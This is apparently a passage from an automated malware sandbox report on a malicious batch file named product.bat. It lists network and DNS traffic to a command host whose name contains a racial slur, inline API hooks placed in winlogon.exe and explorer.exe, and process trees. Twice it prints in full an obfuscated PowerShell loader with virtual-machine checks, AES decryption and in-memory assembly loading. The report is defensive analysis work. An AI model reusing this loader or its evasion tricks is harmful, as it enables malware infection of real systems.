                                                Dec 13, 2024 13:34:29.119363070 CET498934988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:29.119889021 CET498934988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:29.239706039 CET498849893103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:34:31.845710993 CET498849893103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:34:31.845777035 CET498934988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:56.855470896 CET498934988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:56.975264072 CET498849893103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:35:07.654098034 CET498934988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:35:07.773895025 CET498849893103.230.121.81192.168.2.7
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 13, 2024 13:31:44.759985924 CET5529653192.168.2.71.1.1.1
                                                Dec 13, 2024 13:31:44.899945021 CET53552961.1.1.1192.168.2.7
                                                Dec 13, 2024 13:32:22.974303961 CET4941053192.168.2.71.1.1.1
                                                Dec 13, 2024 13:32:23.349615097 CET53494101.1.1.1192.168.2.7
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 13, 2024 13:31:44.759985924 CET192.168.2.71.1.1.10xb98eStandard query (0)iam.nigga.dadA (IP address)IN (0x0001)false
                                                Dec 13, 2024 13:32:22.974303961 CET192.168.2.71.1.1.10x4772Standard query (0)iam.nigga.dadA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 13, 2024 13:31:27.826252937 CET1.1.1.1192.168.2.70x27d9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                Dec 13, 2024 13:31:27.826252937 CET1.1.1.1192.168.2.70x27d9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                Dec 13, 2024 13:31:42.525688887 CET1.1.1.1192.168.2.70xca7eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                Dec 13, 2024 13:31:42.525688887 CET1.1.1.1192.168.2.70xca7eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                Dec 13, 2024 13:31:44.899945021 CET1.1.1.1192.168.2.70xb98eNo error (0)iam.nigga.dad103.230.121.81A (IP address)IN (0x0001)false
                                                Dec 13, 2024 13:32:23.349615097 CET1.1.1.1192.168.2.70x4772No error (0)iam.nigga.dad103.230.121.81A (IP address)IN (0x0001)false

                                                Code Manipulations

                                                Function NameHook TypeActive in Processes
                                                ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                Function NameHook TypeNew Data
                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                Function NameHook TypeNew Data
                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:6
                                                Start time:07:31:07
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" "
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:07:31:07
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:07:31:08
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:wmic diskdrive get Model
                                                Imagebase:0x7ff7fa7f0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:07:31:08
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\findstr.exe
                                                Wow64 process (32bit):false
                                                Commandline:findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
                                                Imagebase:0x7ff6904f0000
                                                File size:36'352 bytes
                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:11
                                                Start time:07:31:10
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:07:31:10
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -WindowStyle Hidden
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:07:31:21
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\dllhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}
                                                Imagebase:0x7ff7d8730000
                                                File size:21'312 bytes
                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:15
                                                Start time:07:31:21
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\winlogon.exe
                                                Wow64 process (32bit):false
                                                Commandline:winlogon.exe
                                                Imagebase:0x7ff6fc1b0000
                                                File size:906'240 bytes
                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:16
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\lsass.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\lsass.exe
                                                Imagebase:0x7ff6d9390000
                                                File size:59'456 bytes
                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:17
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:18
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\dwm.exe
                                                Wow64 process (32bit):false
                                                Commandline:"dwm.exe"
                                                Imagebase:0x7ff74b010000
                                                File size:94'720 bytes
                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:19
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:07:31:26
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:23
                                                Start time:07:31:26
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:24
                                                Start time:07:31:26
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:wmic diskdrive get Model
                                                Imagebase:0x7ff7fa7f0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:25
                                                Start time:07:31:26
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\findstr.exe
                                                Wow64 process (32bit):false
                                                Commandline:findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
                                                Imagebase:0x7ff6904f0000
                                                File size:36'352 bytes
                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:08:46:25
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:27
                                                Start time:08:46:27
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:28
                                                Start time:08:46:28
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:29
                                                Start time:08:46:28
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:30
                                                Start time:08:46:29
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:31
                                                Start time:08:46:30
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:32
                                                Start time:08:46:30
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:33
                                                Start time:08:46:31
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:34
                                                Start time:08:46:31
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:35
                                                Start time:08:46:31
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -WindowStyle Hidden
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:36
                                                Start time:08:46:31
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:37
                                                Start time:08:46:34
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:38
                                                Start time:08:46:34
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:39
                                                Start time:08:46:34
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:40
                                                Start time:08:46:35
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:41
                                                Start time:08:46:35
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:42
                                                Start time:08:46:36
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:43
                                                Start time:08:46:36
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:44
                                                Start time:08:46:36
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
